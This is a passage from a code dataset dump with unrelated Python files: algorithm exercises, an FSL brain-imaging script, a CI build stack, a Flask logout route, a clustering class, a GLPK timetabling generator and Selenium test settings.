print(mem)\n return max(mem)\n\n","sub_path":"algorithms/53_Maximum_Subarray.py","file_name":"53_Maximum_Subarray.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"475593744","text":"#s1 = 'SPAM' s2 = 'SCAM'\n#Ecrire une fonctions qui retourne une liste contenant les carateres communs a ces 2 listes\n\ns1 = 'SPAM'\ns2 = 'SCAM'\n\ndef Comparator(x,y):\n\n list1 = list(x)\n list2 = list(y)\n listout = []\n\n for a in range(len(list1)):\n\n for b in range(len(list2)):\n if list1[a] == list2[b]:\n listout.append(list1[a])\n return print(listout)\n\nComparator(s1,s2)\n","sub_path":"Comp_OT.py","file_name":"Comp_OT.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"175105562","text":"import os\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport nipype.interfaces.fsl as fsl # importing 
FSL interface functions\n\n# Directory where your data set resides. This needs to be customized\ndataDir = '/home/satoru/Teaching/fMRI_Fall_2018/Data/ds102'\n\n# creating an object for BET process\nmybet = fsl.BET()\n\n# an T1 weighted image from one of the subjects\nimageT1 = os.path.join(dataDir,'sub-26/anat/sub-26_T1w.nii.gz')\n\n# output image file name\nimageT1Out = os.path.join(dataDir,'sub-26/anat/sub-26_T1w_brain.nii.gz')\n\n# specifying the input and output file names in the BET object\nmybet.inputs.in_file = imageT1\nmybet.inputs.out_file = imageT1Out\n\n# running BET\nmybet.run()\n\n\n\n\n# Importing custom functions for displaying sections\nimport sys\nsys.path.append('functions')\nfrom DisplaySection import show_section, load_nii_data\n\n# loading the data matrices\nX = load_nii_data(imageT1)\nXbet = load_nii_data(imageT1Out)\n\n# showing the before and after images\nplt.subplot(121)\nshow_section(X, 'xy', 140)\nplt.title('Original')\nplt.subplot(122)\nshow_section(Xbet, 'xy', 140)\nplt.title('After BET')\nplt.show()\n\n\n\n# playing with thresholds, then the output file\n# first, threshold = 0.2\nimageT1Out02 = os.path.join(dataDir,'sub-26/anat/sub-26_T1w_brain_f02.nii.gz')\nmybet.inputs.frac = 0.2 # here, actually specifying the threshold\nmybet.inputs.out_file = imageT1Out02\nmybet.run()\n\n# second, threshold = 0.8\nimageT1Out08 = os.path.join(dataDir,'sub-26/anat/sub-26_T1w_brain_f08.nii.gz')\nmybet.inputs.frac = 0.8 # here, actually specifying the threshold\nmybet.inputs.out_file = imageT1Out08\nmybet.run()\n\n\n# showing the skull stripping with various parameters\nplt.figure(figsize=[10,2.5])\n# loading the data matrices\nX = load_nii_data(imageT1)\nXbet02 = load_nii_data(imageT1Out02)\nXbet = load_nii_data(imageT1Out)\nXbet08 = load_nii_data(imageT1Out08)\n\n# showing the before and after images\nplt.subplot(141)\nshow_section(X, 'xy', 140)\nplt.title('Original')\nplt.subplot(142)\nshow_section(Xbet02, 'xy', 140)\nplt.title('Threshold 0.2')\nplt.subplot(143)\nshow_section(Xbet, 'xy', 140)\nplt.title('Threshold 0.5 (default)')\nplt.subplot(144)\nshow_section(Xbet08, 'xy', 140)\nplt.title('Threshold 0.8')\nplt.show()\n\n\n\n\n\n\n","sub_path":"Norm/SkullStrip_fsl.py","file_name":"SkullStrip_fsl.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"381978683","text":"class Main(newSchedStack):\n\n def __init__(self,stackargs):\n\n newSchedStack.__init__(self,stackargs)\n\n self.parse.add_required(key=\"repo_url\")\n self.parse.add_required(key=\"docker_repo\")\n\n self.parse.add_required(key=\"repo_branch\",default=\"dev\")\n self.parse.add_required(key=\"docker_host\",default=\"null\")\n\n # repo_key_group should automatically added if the \"category\" for the stack is \"build\"\n self.parse.add_required(key=\"repo_key_group\")\n\n self.parse.add_optional(key=\"aws_default_region\",default=\"us-east-1\")\n self.parse.add_optional(key=\"docker_tag_method\",default=\"commit_hash\")\n self.parse.add_optional(key=\"config_env\",default=\"private\")\n self.parse.add_optional(key=\"dockerfile\",default=\"Dockerfile\") # dockerfile to do build\n self.parse.add_optional(key=\"dockerfile_test\",default=\"null\") # dockerfile to do unit-test\n\n # this is actually a placeholder to provided consistency. 
\n # part of the saas, but will create an alternative stack\n # that separates more cleanly from saas\n self.parse.add_optional(key=\"triggered_branches\",default=\"dev\") \n\n # substacks can be referenced as fqn with <username>:::<repo>::<stack_name>\n # or <username>:::<stack_name> since stacks are first class citizens\n self.stack.add_substack(\"elasticdev:::ed_core::run_commit_info\")\n self.stack.add_substack(\"elasticdev:::docker::ec2_standby_ci\")\n self.stack.add_substack(\"elasticdev:::docker::docker_build\")\n self.stack.add_substack(\"elasticdev:::ed_core::empty_stack\")\n self.stack.add_substack('elasticdev:::ec2_server_stop')\n\n self.stack.init_substacks()\n\n def run_test(self):\n\n self.parse.add_required(key=\"repo_url\")\n self.init_variables()\n\n # Set docker host accordingly\n if not self.docker_host:\n self.docker_host = self.stackargs[\"docker_host\"] = \"{}-docker_host\".format(self.stack.cluster) \n\n # If not test scripts, we just return and skip unit_tests\n if not self.dockerfile_test:\n\n inputargs = {\"default_values\":{}}\n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n\n description = 'No (uni-)tests to run'\n inputargs[\"human_description\"] = description\n inputargs[\"default_values\"][\"human_description\"] = description\n\n inputargs[\"display_hash\"] = self.stack.get_hash_object(inputargs)\n\n return self.stack.empty_stack.insert(display=True,**inputargs)\n \n # This sets the commit info need to register the image\n # we don't put this in the parsing arguments requested \n # since it is retrieved from the \"run\"\n self.set_commit_info()\n \n default_values = {\"commit_hash\":self.commit_hash}\n default_values[\"config_env\"] = self.config_env\n default_values[\"branch\"] = self.repo_branch\n default_values[\"repo_branch\"] = self.repo_branch\n default_values[\"repo_url\"] = self.repo_url\n default_values[\"repo_key_group\"] = self.repo_key_group\n\n if hasattr(self,\"commit_info\"): \n default_values[\"commit_info\"] = self.commit_info\n \n # revisit 34098732086501259\n # currently, we placed the dockerfile right into\n # run variables. 
in the future, we may want to \n # separate this dockerfile (test) from dockerfile (build)\n # not urgent right now, in this instance, they run in order\n # from unit_test (dockerfile_test) to build (dockerfile)\n overide_values = {\"docker_host\":self.docker_host}\n overide_values[\"dockerfile\"] = self.dockerfile_test\n \n inputargs = {\"default_values\":default_values,\n \"overide_values\":overide_values}\n \n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n inputargs[\"human_description\"] = 'Performing unit test with Dockerfile\"{}\"'.format(self.dockerfile_test)\n \n return self.stack.docker_build.insert(display=True,**inputargs)\n\n def run_record(self):\n\n # init is set by the saas automatically \n # when run for the first time\n self.parse.add_optional(key=\"init\",default=\"null\")\n self.parse.add_optional(key=\"commit_info\",default=\"null\")\n self.parse.add_optional(key=\"commit_hash\",default=\"null\")\n self.init_variables()\n\n if not self.commit_info and not self.init:\n msg = \"you need commit_info unless this is the first code retrieval\"\n self.stack.ehandle.NeedRtInput(message=msg)\n\n inputargs = {\"automation_phase\":\"continuous_delivery\"}\n inputargs[\"human_description\"] = 'Publish commit_info'\n inputargs[\"default_values\"] = {\"commit_info\":self.commit_info}\n return self.stack.run_commit_info.insert(display=True,**inputargs)\n\n def run_stop_vm(self):\n\n self.init_variables()\n\n # Set docker host accordingly\n if not self.docker_host:\n self.docker_host = self.stackargs[\"docker_host\"] = \"{}-docker_host\".format(self.stack.cluster) \n\n default_values = {\"hostname\":self.docker_host}\n inputargs = {\"default_values\":default_values}\n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n inputargs[\"human_description\"] = 'Stopping docker_host \"{}\"'.format(self.docker_host)\n\n return self.stack.ec2_server_stop.insert(display=True,**inputargs)\n\n def run_build(self):\n\n self.parse.add_required(key=\"repo_url\")\n self.init_variables()\n\n # Set docker host accordingly\n if not self.docker_host:\n self.docker_host = self.stackargs[\"docker_host\"] = \"{}-docker_host\".format(self.stack.cluster) \n\n # This sets the commit info need to register the image\n # we don't put this in the parsing arguments requested \n # since it is retrieved from the \"run\"\n self.set_commit_info()\n\n default_values = {\"docker_repo\":self.docker_repo}\n default_values[\"repo_key_group\"] = self.repo_key_group\n # We use the abbrev commit hash with 7 characters\n default_values[\"tag\"] = self.commit_hash[0:6]\n default_values[\"config_env\"] = self.config_env\n default_values[\"branch\"] = self.repo_branch\n default_values[\"repo_branch\"] = self.repo_branch\n default_values[\"repo_url\"] = self.repo_url\n default_values[\"commit_hash\"] = self.commit_hash\n default_values[\"docker_repo\"] = self.docker_repo\n default_values[\"aws_default_region\"] = self.aws_default_region\n\n if hasattr(self,\"commit_info\"): \n default_values[\"commit_info\"] = self.commit_info\n\n # do we need to overide here?\n overide_values = {\"docker_host\":self.docker_host}\n overide_values[\"dockerfile\"] = self.dockerfile\n\n inputargs = {\"default_values\":default_values,\n \"overide_values\":overide_values}\n\n inputargs[\"automation_phase\"] = \"continuous_delivery\"\n inputargs[\"human_description\"] = 'Building docker container for commit_hash \"{}\"'.format(self.commit_hash)\n\n return self.stack.ec2_standby_ci.insert(display=True,**inputargs)\n\n def run(self):\n 
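# Added note (editor): run() only declares the jobs; the actual execution order is driven by schedule() below, which chains record -> test -> build -> stop_vm through the on_success/on_failure hooks.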
\n self.stack.unset_parallel()\n self.add_job(\"test\",instance_name=\"auto\")\n self.add_job(\"record\",instance_name=\"auto\")\n self.add_job(\"build\",instance_name=\"auto\")\n self.add_job(\"stop_vm\",instance_name=\"auto\")\n\n return self.finalize_jobs()\n\n def schedule(self):\n\n sched = self.new_schedule()\n sched.job = \"record\"\n sched.archive.timeout = 600\n sched.archive.timewait = 120\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.retries = 1\n sched.conditions.frequency = \"wait_last_run 20\"\n sched.conditions.noncurrent = [ \"test\", \"build\", \"stop_vm\" ]\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Insert commit info into run\"\n sched.on_success = [ \"test\" ]\n self.add_schedule()\n\n sched = self.new_schedule()\n sched.job = \"test\"\n sched.archive.timeout = 1800\n sched.archive.timewait = 180\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.frequency = \"wait_last_run 60\"\n\n # Cannot have concurrency with a single docker host\n # The belows says another unit_test cannot run\n # while build is running b/c they run on the \n # same dockerhost. This can change with a more sophisicated\n # stack. This will also prevent a bunch of builds from completing\n # b/c of a race conditions. It's not a big deal because \n # the \"runs\" don't complete as it waits to stop the server, but\n # the unit_test and register of docker has completed.\n\n sched.conditions.noncurrent = [ \"build\", \"stop_vm\" ]\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Running unit_test for code\"\n sched.on_success = [ \"build\" ]\n sched.on_failure = [ \"stop_vm\" ]\n self.add_schedule()\n \n sched = self.new_schedule()\n sched.job = \"build\"\n sched.archive.timeout = 1800\n sched.archive.timewait = 180\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.noncurrent = [ \"test\", \"stop_vm\" ]\n sched.conditions.frequency = \"wait_last_run 60\"\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Building docker container with code\"\n sched.on_success = [ \"stop_vm\" ]\n sched.on_failure = [ \"stop_vm\" ]\n self.add_schedule()\n\n sched = self.new_schedule()\n sched.job = \"stop_vm\"\n sched.archive.timeout = 300\n sched.archive.timewait = 10\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.noncurrent = [ \"test\", \"build\" ]\n sched.conditions.frequency = \"wait_last_run 10\"\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Stopping docker host\"\n self.add_schedule()\n\n return self.get_schedules()\n","sub_path":"stacks/_ed_configs/ec2_ci/_main/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":10288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"312717610","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/springheel/genmultipleindex.py\n# Compiled at: 2019-12-29 18:53:39\n# Size of source mod 2**32: 2921 bytes\nimport os\nfrom slugify import slugify, slugify_url\nsep = '\\n'\n\ndef genMultipleIndex(comics, characters_page, translated_strings):\n \"\"\"\n Generate an index page for a site with multiple comics.\n\n Parameters\n ----------\n 
comics : list\n        A list of the Comics on the site.\n    characters_page : bool\n        Whether or not to add character-page links.\n    translated_strings : dict\n        The translation file contents for this site.\n    \"\"\"\n    elements = []\n    dopen = '<div class=\"intro\">'\n    dclose = '</div>'\n    golatest_s = translated_strings['golatest_s']\n    gofirst_s = translated_strings['gofirst_s']\n    if characters_page == True:\n        character_s = translated_strings['char_s']\n    ltemplate = ['<h2>{category}</h2>', '<img src=\"{header}\" alt=\"{category}\" />',\n     '<p class=\"author\">by {author}</p>', '<p class=\"desc\">{desc} (<span class=\"status\">{status}</span>)</p>',\n     '<p>{golatest} | {gofirst}</p>']\n    maintemplate = sep.join(ltemplate)\n    for i in comics:\n        golatest = [\n         '<a href=\"', i.lbp_link, '\">', golatest_s, '</a>']\n        golatest = ''.join(golatest)\n        gofirst = ['<a href=\"', i.fbp_link, '\">', gofirst_s, '</a>']\n        gofirst = ''.join(gofirst)\n        elements.append(dopen)\n        div = maintemplate.format(header=(i.header), category=(i.category_escaped),\n          author=(i.author),\n          desc=(i.desc),\n          status=(i.statuss),\n          golatest=golatest,\n          gofirst=gofirst)\n        elements.append(div)\n        if characters_page == True:\n            if i.chars_file != 'None':\n                if i.chars_file != 'False':\n                    cat_slug = slugify_url(i.category)\n                    characters_link = ''.join([cat_slug, '-', 'characters.html'])\n                    char_line = '<p><a href=\"{characters_link}\">{character_s}</a></p>'.format(characters_link=characters_link, character_s=character_s)\n                    elements.append(char_line)\n        elements.append(dclose)\n    return elements","sub_path":"pycfiles/springheel-5.2.4-py3.8/genmultipleindex.cpython-38.py","file_name":"genmultipleindex.cpython-38.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"457106757","text":"from flask import Blueprint,Flask,render_template,redirect,url_for,request,flash,session,logging\n\nlogout_b = Blueprint('logout', __name__)\n\n\n#Logout operation \n@logout_b.route('/logout')\ndef logout():\n    session.clear()\n    return redirect(url_for('log_reg.login'))","sub_path":"views/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"56400169","text":"import numpy as np\nimport random\nfrom IState import IState\nfrom sklearn.utils import shuffle\n\nclass Cluster(IState):\n    def __init__(self, X, k, grupos = None,centroides = None):\n        self.X = X\n        self.grupos = grupos\n        self.centroides = centroides\n        self.k = k\n        self.sse = 0\n        if grupos is not None:\n            self.GerarCentroide()\n        else:\n            self.GerarGrupos()\n\n    def Shuffle(self):\n        self.X, self.grupos = shuffle(self.X, self.grupos)\n        self.GerarCentroide()\n\n    def set_k(self,k):\n        self.k = k\n\n    def get_grupos(self):\n        return np.arange(0,self.k)\n    \n    def set_grupos(self, grupos):\n        self.grupos = grupos\n        self.GerarCentroide()\n    \n    def GerarGrupos(self):\n        length = len(self.X)\n        repeat = int(length/self.k) + 1\n        #self.grupos = np.random.randint(0,self.k,len(self.X))\n        self.grupos = np.array([_ for _ in range(self.k)]*repeat)[:length]\n        #print(self.grupos)\n        \n        self.GerarCentroide()\n\n    def GerarCentroide(self):\n        self.centroides = np.array([sum(self.X[self.grupos == g])/len(self.X[self.grupos == g]) for g in self.get_grupos()])\n        self.SSE()\n\n    \n    ####### Euclidean Distance ##########\n    def SomaDistanciaEuclidia(self, X, centroide):\n        return sum([np.linalg.norm(x-centroide) for x in X])\n\n    def SSE(self):\n        
self.sse = sum([self.SomaDistanciaEuclidia(self.X[self.grupos == g],self.centroides[g]) for g in self.get_grupos()])\n        return self.sse\n\n    def Show(self):\n        print('Grupos:', self.grupos)\n        print('Centroides:', self.centroides)\n        print('Pontos:', self.X)\n\n    ##### IState ######\n    def Value(self):\n        return self.sse\n\n    def NextState(self):\n        return self.Mutation()\n\n    #Compares whether the groups of two clusters are equal\n    def Equal(self, other):\n        return np.array_equal(self.grupos, other.grupos)\n\n    #IMutable methods\n    def Crossover(self,other):\n        r = random.randint(0, len(self.grupos) - 1)\n        son = np.concatenate((self.grupos[:r], other.grupos[r:]), axis=0)\n        daug = np.concatenate((other.grupos[:r], self.grupos[r:]), axis=0)\n\n\n        #If the number of groups is less than K, cancel this crossover\n        if(len(np.unique(son)) < self.k):\n            son = self.grupos\n        if(len(np.unique(daug)) < self.k):\n            daug = other.grupos\n        son, daug = Cluster(X = self.X, k = self.k, grupos=son), Cluster(X = self.X, k = self.k, grupos=daug)\n\n\n\n        return son, daug\n    \n    def get_number_states(self):\n        return self.k\n    \n    def ChangeState(self, index, value):\n        new_grupos = self.grupos.copy()\n\n        old_value = new_grupos[index]\n        new_value = old_value + value\n\n        if(new_value < 0):\n            new_grupos[index] = self.k-1\n        elif new_value >= self.k:\n            new_grupos[index] = 0\n        else:\n            new_grupos[index] = new_value\n        \n        #Check that there are still K groups\n        if len(np.unique(new_grupos)) < self.k:\n            new_grupos[index] = old_value #Revert to the previous state, keeping K groups\n\n        return Cluster(\n            X = self.X, \n            k = self.k, \n            grupos = new_grupos\n        )\n\n\n    def Mutation(self):\n        new_grupos = self.grupos.copy()\n\n        if(self.k > 1):#If there is only one group, no mutation is needed\n            index = random.randint(0, len(new_grupos)-1)\n            while new_grupos[index] == self.grupos[index] or len(np.unique(new_grupos)) < self.k:\n                index = random.randint(0, len(new_grupos)-1)\n            new_grupos[index] = random.randint(0, self.k - 1)\n        \n        return Cluster(\n            X = self.X, \n            k = self.k, \n            grupos = new_grupos\n        ) \n","sub_path":"trab2/code/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
+{"seq_id":"70896407","text":"import requests\n\n\nclass RequestHandler:\n\n    def __init__(self):\n        self.session = requests.Session()\n\n    def visit(self, url, method, params=None, data=None, json=None, **kwargs):\n        # requests.Session.request expects (method, url, ...)\n        res = self.session.request(method, url, params=params, data=data, json=json, **kwargs)\n        try:\n            return res.json()\n        except ValueError:\n            print(\"not json\")\n","sub_path":"python 25 code/class19_20200102_excel_ddt/common/request_handler.py","file_name":"request_handler.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"126119409","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# Author: leeyoshinari\r\nimport os\r\nimport json\r\nimport queue\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom testing import Testing\r\nfrom logger import logger, cfg\r\n\r\n\r\nclass Scheduler(object):\r\n    def __init__(self):\r\n        self.testing = Testing()\r\n        self.thread_pool_size = max(1, int(cfg.getConfig('thread_pool')))\r\n        self.test_task = queue.Queue()   # create the task queue\r\n        self.executor = ThreadPoolExecutor(self.thread_pool_size)  # create the thread pool\r\n\r\n        self.run()\r\n\r\n    @property\r\n    def task(self):\r\n        return None\r\n\r\n    @task.setter\r\n    def task(self, value):\r\n        
self.test_task.put((self.testing.run, value))\r\n\r\n    def worker(self):\r\n        \"\"\"\r\n        Fetch a test task from the queue and execute it\r\n        :return: \r\n        \"\"\"\r\n        while True:\r\n            func, param = self.test_task.get()\r\n            func(param)\r\n            self.test_task.task_done()\r\n\r\n    def run(self):\r\n        \"\"\"\r\n        Start the thread pool to execute test tasks\r\n        :return:\r\n        \"\"\"\r\n        for i in range(self.thread_pool_size):\r\n            self.executor.submit(self.worker)\r\n\r\n\r\ndef replace_email(src, new_dict, dst):\r\n    old_dict = json.load(open(src, 'r', encoding='utf-8'))\r\n    for k, v in new_dict.items():\r\n        old_dict.update({k: v})\r\n\r\n    with open(dst, 'w', encoding='utf-8') as f:\r\n        f.write(json.dumps(old_dict))\r\n\r\n\r\ndef replace_config(src, new_dict, dst):\r\n    old_dict = {}\r\n    with open(src, 'r', encoding='utf-8') as f:\r\n        lines = f.readlines()\r\n\r\n    for line in lines:\r\n        k_v = line.split('//')[0].split('=')\r\n        old_dict.update({k_v[0].strip(): k_v[1].strip()})\r\n\r\n    for k, v in new_dict.items():\r\n        old_dict.update({k: v})\r\n\r\n    lines = [f'{k}={v}\\n' for k, v in old_dict.items()]\r\n    with open(dst, 'w', encoding='utf-8') as f:\r\n        f.writelines(lines)\r\n","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"299040275","text":"import random\nimport json\n\ndef gen_except(resources, courses):\n\tresult = dict()\n\tcheck = list()\n\tfor i in range(resources - 1):\n\t\tresult[i] = list()\n\t\tc = random.randint(1, courses)\n\t\tindex = random.randint(0, courses - c)\n\t\tfor j in range(c):\n\t\t\tif index not in check:\n\t\t\t\tcheck.append(index)\n\t\t\tresult[i].append(index)\n\t\t\tindex = random.randint(index + 1, courses - (c - j - 1))\n\tresult[resources - 1] = list()\n\tfor i in range(courses):\n\t\tif i not in check:\n\t\t\tresult[resources - 1].append(i)\n\texcept_result = dict()\n\tfor i in result:\n\t\texcept_result[i] = list()\n\t\tfor j in range(courses):\n\t\t\tif j not in result[i]:\n\t\t\t\texcept_result[i].append(j)\n\tf = open('gen.txt', 'w')\n\tf.write(json.dumps(result))\n\treturn except_result\n\ndef gen():\n\tf = open('gen.mod', 'a')\n\tf.write('set I;\\n/* set of courses */\\nset J;\\n/* set of rooms */\\nset T;\\n/* set of teachers */\\nset K;\\n/* set of time slots */\\n')\n\n\tcourses = 24\n\trooms = 30\n\tteachers = 15\n\ttimeslots = 5\n\n\tt_excepted = gen_except(teachers, courses)\n\tr_excepted = gen_except(rooms, courses)\n\n\tfor i in range(rooms):\n\t\tif len(r_excepted[i]) > 0:\n\t\t\tf.write('set R' + str(i) + ';\\n/* room ' + str(i) + ' */\\nset ER' + str(i) + ';\\n/* exception courses for room ' + str(i) + ' */\\n')\n\tfor i in range(teachers):\n\t\tif len(t_excepted[i]) > 0:\n\t\t\tf.write('set T' + str(i) + ';\\n/* teacher ' + str(i) + ' */\\nset ET' + str(i) + ';\\n/* exception courses for teacher ' + str(i) + ' */\\n')\n\t\n\tf.write('param cost{i in I, j in J, t in T, k in K}, >= 0;\\n/* cost of allocating room j to course i with teacher t in time slot k */\\n\\nvar x{i in I, j in J, t in T, k in K} binary;\\n/* x[i,j,t,k] = 1 means room j is assigned to course i with teacher t in time slot k\\nx[i,j,t,k] = 0 otherwise */\\n\\ns.t. first{i in I}: sum{j in J, t in T, k in K} x[i,j,t,k] = 1;\\n\\ns.t. second{j in J, k in K}: sum{i in I, t in T} x[i,j,t,k] <= 1;\\n\\ns.t. third{t in T, k in K}: sum{i in I, j in J} x[i,j,t,k] <= 1;\\n\\n')\n\n\tfor i in range(rooms):\n\t\tif len(r_excepted[i]) > 0:\n\t\t\tf.write('s.t. 
cr' + str(i) + ': sum{i in ER' + str(i) + ', j in R' + str(i) + ', t in T, k in K} x[i,j,t,k] = 0;\\n\\n')\n\tfor i in range(teachers):\n\t\tif len(t_excepted[i]) > 0:\n\t\t\tf.write('s.t. ct' + str(i) + ': sum{i in ET' + str(i) + ', j in T' + str(i) + ', t in T, k in K} x[i,j,t,k] = 0;\\n\\n')\n\n\tf.write('minimize obj: sum{i in I, j in J, t in T, k in K} cost[i,j,t,k] * x[i,j,t,k];\\n/* the objective is to find a cheapest assignment */\\n\\nsolve;\\n\\n')\n\t\n\tf.write('printf {i in I, j in J, t in T, k in K: x[i,j,t,k] = 1} \\'result: %s\\\\n\\', k;\\n\\n')\n\n\tf.write('data;\\n\\n')\n\n\tf.write('set I :=')\n\tfor i in range(courses):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n\\n')\n\n\tf.write('set T :=')\n\tfor i in range(teachers):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n')\n\n\tf.write('set J :=')\n\tfor i in range(rooms):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n')\n\n\tf.write('set K :=')\n\tfor i in range(timeslots):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n')\n\n\tfor i in range(teachers):\n\t\tif len(t_excepted[i]) > 0:\n\t\t\tf.write('set T' + str(i) + ' := ' + str(i) + ';\\nset ET' + str(i) + ' :=')\n\t\t\tfor j in t_excepted[i]:\n\t\t\t\tf.write(' ' + str(j))\n\t\t\tf.write(';\\n\\n')\n\tfor i in range(rooms):\n\t\tif len(r_excepted[i]) > 0:\n\t\t\tf.write('set R' + str(i) + ' := ' + str(i) + ';\\nset ER' + str(i) + ' :=')\n\t\t\tfor j in r_excepted[i]:\n\t\t\t\tf.write(' ' + str(j))\n\t\t\tf.write(';\\n\\n')\n\n\tf.write('param cost :=\\n')\n\n\tfor k in range(timeslots):\n\t\tfor t in range(teachers):\n\t\t\tf.write('[*,*,' + str(t) + ',' + str(k) + ']:')\n\t\t\tfor r in range(rooms):\n\t\t\t\tf.write(' ' + str(r))\n\t\t\tf.write(' :=\\n')\n\t\t\tfor i in range(courses):\n\t\t\t\tf.write(str(i))\n\t\t\t\tfor r in range(rooms):\n\t\t\t\t\tf.write(' ' + str(k + 1))\n\t\t\t\tf.write('\\n')\n\tf.write(';\\nend;')\t\t\t\n\ngen()\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10965741","text":"__author__ = 'dboyko'\n\nclass my_credentials():\n\n def login_var(self):\n return {\n #\"tms_url\": \"http://172.16.10.145:8080/login.jsp\", # \"http://172.16.10.65:8080/login.jsp\", # \"http://172.16.10.146:8080/login.jsp\"\n #\"baseurl\": \"https://admin.readytech.com\", # \"http://172.16.10.65:8080/AdminPortal/\", # \"http://172.16.10.146:8080/AdminPortal\",\n \"tms_146\": \"http://172.16.10.146:8080/login.jsp\",\n \"tms_url\": \"http://172.16.10.65:8080/login.jsp\",\n \"baseurl\": \"http://172.16.10.65:8080/AdminPortal/\",\n\n \"customername\": \"ReadyTech\",\n \"username\": \"dclienttester\",\n \"username_acceptTest\": \"TestNewUser\",\n \"password\": \"q2w3edc\",\n \"tablexPath\": \".//*[@id='j_idt137']/tbody/tr\"}\n\n def tabs(self):\n return {\n \"events\": \"Events\",\n \"access\": \"Access\",\n \"images\": \"Images\",\n \"users\": \"Users\",\n \"deployments\": \"Deployments\",\n \"deployments_plan\": \"Deployment Plans\",\n \"templates\": \"Templates\",\n 'vouchers': \"Vouchers\",\n 'platforms': \"Platforms\",\n }\n\n def sub_buttons(self):\n return{\n \"events_list\": \"List\",\n \"events_detail\": \"Detail\",\n \"events_access\": \"Access\",\n \"events_labs\": \"Labs\",\n \"events_notification\": \"Notifications\",\n \"deployments\": \"Deployments\",\n \"history\": \"History\",\n \"platform\": \"Platforms\",\n \"spla\": \"SPLA\",\n \"cache\": \"Cache\",\n \"image_notes\": \"Image Notes\",\n\n # Deployments tab: xpath's\n 
'depl_list': \"//div[5]/li//li/a\",\n \"depl_channels\": \"//div[5]/li//li[2]/a\", # \"Channels\",\n \"depl_channel_scripts\": \"//div[5]/li//li[3]/a\", # \"Channel Scripts\",\n \"depl_user_actions\": \"//div[5]/li//li[4]/a\", # \"User Actions\",\n \"depl_scripts\": \"//div[5]/li//li[5]/a\", # \"Scripts\",\n \"depl_events\": \"//div[5]/li//li[6]/a\", # \"events\": \"Events\",\n \"depl_templates_sub\": \"//div[5]/li//li[7]/a\", # \"templates_sub\": \"Templates\",\n 'depl_history': \"//div[5]/li//li[8]/a\",\n\n # Deployment Plans tab: xpath's\n 'depl_plans_list': \"//div[6]/li/ul/li/a\",\n 'depl_plans_deployments': \"//div[6]/li/ul/li[2]/a\",\n 'depl_plans_utilization': \"//div[6]/li/ul/li[3]/a\",\n 'depl_plans_script': \"//div[6]/li/ul/li[4]/a\",\n 'depl_plans_templates': \"//div[6]/li/ul/li[5]/a\",\n\n #\"deployments_deplPlan\": \"//div[@id='deploymentplan']/li/ul/li[2]/a\",\n #\"utilization\": \"Utilization\",\n #\"scripts_deplPlan\": \"//div[@id='deploymentplan']/li/ul/li[4]/a\",\n #\"templates\": \"Templates\",\n \n # Templates tab: xpath's\n 'list': \"//div[7]/li/ul/li/a\",\n 'detail': \"//div[7]/li/ul/li[2]/a\",\n 'utilization': \"//div[7]/li/ul/li[3]/a\",\n 'content': \"//div[7]/li/ul/li[4]/a\",\n 'vouchers': \"//div[7]/li/ul/li[5]/a\",\n 'extensions': \"//div[7]/li/ul/li[6]/a\",\n 'notifications': \"//div[7]/li/ul/li[7]/a\",\n 'rules': \"//div[7]/li/ul/li[8]/a\",\n 'security': \"//div[7]/li/ul/li[9]/a\",\n 'history': \"//div[7]/li/ul/li[10]/a\",\n\n # Vouchers tab: xpath\n 'voucher_list': \"//div[8]/li//li/a\",\n 'voucher_detail': \"//div[8]/li//li[2]/a\",\n 'voucher_notification': \"//div[8]/li//li[3]/a\",\n\n # Platforms\n 'platforms_list': \"//div[10]/li//li/a\",\n 'platforms_systems': \"//div[10]/li//li[2]/a\",\n 'platforms_actions': \"//div[10]/li//li[3]/a\",\n }\n\n def buttons(self):\n return{\n \"search_icon\": 